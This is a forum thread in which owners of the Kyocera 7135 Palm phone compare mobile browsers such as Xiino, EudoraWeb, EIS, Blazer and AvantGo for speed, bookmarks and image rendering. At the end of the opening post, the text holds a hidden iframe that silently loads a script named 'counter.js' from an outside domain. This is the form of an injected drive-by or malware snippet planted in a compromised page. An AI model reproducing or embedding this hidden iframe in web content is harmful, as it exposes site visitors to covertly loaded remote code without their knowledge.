Can anyone recommend another browser for the pda/phone. I am not really impressed with the EudoraWeb or the EIS Web that came installed, and don't want to purchase something else with poor performance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
EIS is so dusty on my 7135 that I can't find it anymore! Xiino is fast and provides tons of options. However, no other developers (including Xiino) seem to want to support it. It is still my personal favorite.
Avantgo is pretty good if you want decent graphics and relatively good speed. It just doesn't support bookmarks. If you define a personal channel with just bookmarks (link depth=0) and/or a good PDA portal, you can get by pretty well.
I use both of these along with Eudora Web since every now and then one browser cannot access a site that another will.
Xiino is my favorite as well. It does bother me that Ilinx has pretty much stopped supporting anything but the Japanese versions. It also doesn't help that, because of how Xiino was written, SnapperMail can't support it as the default browser.
A LOT of my surfing with the 7135 is at discussion boards (particularly SPS and here), and EudoraWeb (my Snapper default) is very acceptable for that purpose (the mobile view of this site really flies, and I don't run into the vBulletin/EudoraWeb problem of pages not fully downloading, even with 10 posts per page). Especially since I started using Backdrop GC a couple months ago to liven up some of my "boring" apps (you guys/gals really should give it a look!)
Lack of bookmarks turns me off to AvantGo completely. Blazer is just an "every once in a while" browser for when images matter... it's too slow compared to Xiino and EudoraWeb for the kind of browsing I usually do.
EIS... forget about it. I'm generally not quick to dismiss something new, because resisting change can sometimes cause you to miss out on great things... but using EIS is too painful of an experience to endure for long. But in this case it could be the processor speed of the 7135 that's the bottleneck. Still Kyocera's fault for choosing it though.

I just downloaded EIS's Ipanel. It seems to work OK. It has a few more features over the included EIS web browser. It also includes the ability to download ANIMATED GIF images. And it even plays them! But they play VERY SLOW. I have been searching for a browser that will allow animated GIFs to be played.
Webpro is on the CD that comes with the Palm Tungsten T or T2. It's compatible with the 7135 and displays the best images that I've seen to date. You'd have to find someone with that CD.

Well guys, you convinced me to try Xiino. Although it's not perfect, it really puts EIS into the dust. Xiino makes my web experience on the 7135 a pleasure because of its speed. I could only wish that it allowed more SSL and Java access, along w/more accurate page rendering, but for what it gives, I'm pleased.
Should NetFront 3 become available for Palm OS 4.1, I'd consider purchasing it. In the meantime, Xiino has convinced me that Verizon's Express Network actually does work well when you use the right software. Thanks!

Well, actually, I stand corrected. I've also tried the Blazer browser, and I'm very impressed. It's fast, w/excellent rendering capability. What does this mean? It means I have both the Blazer browser and Xiino on my 7135...

That's the way to do it! They each have their strengths and weaknesses.

The problem with Xiino is that it makes all requests via a proxy server in Japan. It will hurt your browsing speed.
(look for the thread in the i500 forum on "vision not fast" -- all the analysis there on browsers and TCP performance applies to the 7135 and Verizon, too)
I "lost" my EIS Web app (maybe 'cause of a hard reset?) and can't find it on the Web or on the CD. On the CD is Eudora's Internet suite, but that's not the same. On the Web I'm led to iPanel (which is $25). I'm trying to find the web broswer that came installed on the 7135 (the one with the blue globe icon with a orange "swoosh").
